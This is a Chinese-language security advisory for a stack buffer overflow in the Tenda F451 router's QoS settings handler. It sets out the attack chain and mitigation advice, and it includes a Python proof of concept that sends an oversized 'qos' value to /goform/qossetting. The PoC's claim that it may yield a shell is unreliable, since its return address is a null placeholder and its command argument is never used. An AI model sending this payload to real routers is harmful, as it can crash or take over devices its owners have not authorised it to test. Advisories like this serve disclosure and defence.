CVE-2026-6134 Tenda F451路由器栈溢出漏洞

漏洞信息

漏洞编号

CVE-2026-6134

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F451

漏洞概述

Tenda F451路由器在特定版本下存在高危安全漏洞。该漏洞位于处理QoS设置的/goform/qossetting接口中，由于fromqossetting函数未对传入的qos参数进行严格的长度校验，导致发生基于栈的缓冲区溢出。攻击者可利用此漏洞，在无需用户交互的情况下远程发送恶意数据包，触发溢出并可能导致设备崩溃或执行任意代码，严重威胁网络安全。

技术细节

该漏洞根本原因在于Tenda F451路由器固件中/goform/qossetting模块的fromqossetting函数存在典型的内存安全缺陷。当设备Web服务处理来自客户端的请求时，该函数直接接收用户提交的“qos”参数，并使用不安全的字符串拷贝操作（如strcpy或sprintf）将其复制到栈上分配的固定大小缓冲区中，且未对输入数据的长度进行任何有效验证。
攻击者通过构造特制的HTTP请求，将包含大量填充数据和特定覆盖地址的恶意载荷赋值给“qos”参数。当数据长度超过缓冲区大小时，多余的数据将溢出并覆盖栈帧中的返回地址或函数指针。根据CVSS向量分析，攻击者仅需低权限即可通过网络发起攻击。一旦覆盖成功，攻击者可重定向程序执行流至恶意Shellcode，从而在目标系统上远程执行任意代码，完全控制设备。

攻击链分析

STEP 1

侦察与发现

攻击者扫描网络，识别出目标设备为Tenda F451路由器，并确认其运行在受影响的固件版本1.0.0.7_cn_svn7958上。

STEP 2

构造恶意载荷

攻击者分析漏洞点，编写脚本生成一段包含超长字符（如'A'）和特定返回地址的字符串，作为'qos'参数的值。

STEP 3

发送攻击请求

攻击者向目标路由器的/goform/qossetting接口发送POST请求，将构造的恶意载荷作为参数提交。

STEP 4

触发溢出与执行

路由器处理请求时，fromqossetting函数发生栈溢出，覆盖返回地址，程序流程被劫持，执行攻击者预设的代码或导致设备崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_tenda_f451(target_ip, command):
    # Target URL for the vulnerable endpoint
    url = f"http://{target_ip}/goform/qossetting"
    
    # Payload construction: Buffer overflow pattern
    # A large string of 'A's to overflow the stack buffer
    # followed by a return address (simulation)
    # Adjust the length based on the specific buffer size (e.g., 500 bytes)
    overflow_payload = "A" * 500 + "\x00\x00\x00\x00" 
    
    # Data to be sent
    data = {
        "qos": overflow_payload
    }
    
    try:
        print(f"[+] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check device for crash or shell.")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_tenda_f451(target, "")

影响范围

Tenda F451 1.0.0.7_cn_svn7958

防御指南

临时缓解措施

在无法立即升级固件的情况下，建议用户关闭路由器的远程Web管理功能，并通过ACL（访问控制列表）限制对端口80/443的访问，防止外部攻击者利用该漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6134
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6134
3 Details https://www.cvedetails.com/cve/CVE-2026-6134/
4 VulDB https://vuldb.com/cve/CVE-2026-6134
5 Link https://github.com/Jimi-Lab/cve/issues/18
6 Link https://vuldb.com/submit/792876
7 Link https://vuldb.com/vuln/356998
8 Link https://vuldb.com/vuln/356998/cti
9 Link https://www.tenda.com.cn/